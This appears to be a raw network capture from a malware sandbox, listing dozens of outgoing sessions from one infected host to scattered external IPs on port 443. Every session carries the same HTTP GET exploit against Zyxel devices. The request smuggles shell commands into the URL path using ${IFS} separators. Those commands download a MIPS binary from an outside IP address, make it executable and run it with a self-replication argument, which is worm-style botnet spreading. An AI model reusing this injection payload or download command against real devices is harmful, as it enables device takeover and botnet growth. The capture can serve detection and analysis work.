                                        Jan 14, 2024 16:18:46.498151064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4667192.168.2.1357214180.243.222.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498183966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4668192.168.2.1348114159.125.124.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498224974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4669192.168.2.1346266192.147.19.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498259068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4670192.168.2.1357610194.29.86.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498286009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4671192.168.2.1333796138.211.169.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498330116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4672192.168.2.1341424178.90.208.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498373032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4673192.168.2.135248031.226.255.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498424053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4674192.168.2.1354228207.135.71.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498459101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4675192.168.2.1343238182.254.88.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498517990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4676192.168.2.1342942164.75.21.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498569965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4677192.168.2.135757099.112.255.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498605013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4678192.168.2.135097427.93.184.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498630047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4679192.168.2.1355794165.200.203.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498682022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4680192.168.2.1343844196.246.50.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498702049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4681192.168.2.134007492.29.171.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498761892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4682192.168.2.1348076194.173.19.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498811007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4683192.168.2.1346634164.33.62.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498851061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4684192.168.2.1358796187.23.162.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498919010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4685192.168.2.1349206130.77.238.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498948097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4686192.168.2.133410483.201.115.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.498996019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4687192.168.2.135114859.149.21.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499031067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4688192.168.2.1357364124.194.161.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499069929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4689192.168.2.134641218.44.77.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499113083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4690192.168.2.1352030183.84.174.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499149084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4691192.168.2.1334530144.77.164.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499198914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4692192.168.2.135566873.135.247.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499238968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4693192.168.2.1352900179.80.7.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499283075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4694192.168.2.133289452.9.83.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499346018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4695192.168.2.133628844.50.37.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499382019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4696192.168.2.1342386191.77.189.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499427080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4697192.168.2.1333192194.67.86.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499463081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4698192.168.2.1340622144.16.13.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499514103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4699192.168.2.1346866168.221.187.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499558926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4700192.168.2.134389096.4.14.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499614954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4701192.168.2.1339234120.242.49.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499653101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4702192.168.2.135742618.142.65.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499681950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4703192.168.2.134910035.32.45.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499720097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4704192.168.2.133679476.142.143.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499775887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4705192.168.2.135477481.36.153.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499808073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4706192.168.2.1355476115.133.19.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499850988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4707192.168.2.1354698120.91.146.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499886036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4708192.168.2.135234639.207.205.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499937057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4709192.168.2.1346782182.255.99.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499975920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4710192.168.2.1345582204.16.133.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.499990940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4711192.168.2.1333832109.12.239.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500050068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4712192.168.2.1346286110.116.247.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500101089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4713192.168.2.1335142137.242.79.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500121117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4714192.168.2.134324459.210.251.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500164986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4715192.168.2.1350604103.17.180.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500220060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4716192.168.2.134040425.135.140.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500237942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4717192.168.2.135018253.175.175.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500271082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4718192.168.2.1339008206.199.18.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500292063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4719192.168.2.1336840120.134.22.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500350952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4720192.168.2.1354238118.27.242.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500384092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4721192.168.2.1350468149.160.144.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500437975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4722192.168.2.1335304221.99.44.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500488997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4723192.168.2.135145644.179.101.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500519037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4724192.168.2.1342690102.33.244.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500540972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4725192.168.2.133636281.158.82.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500580072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4726192.168.2.134044869.230.24.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500633955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4727192.168.2.1352958145.129.232.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500674963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4728192.168.2.133936036.4.215.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500690937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4729192.168.2.1354068119.171.19.153443
                                        TimestampBytes transferredDirectionData
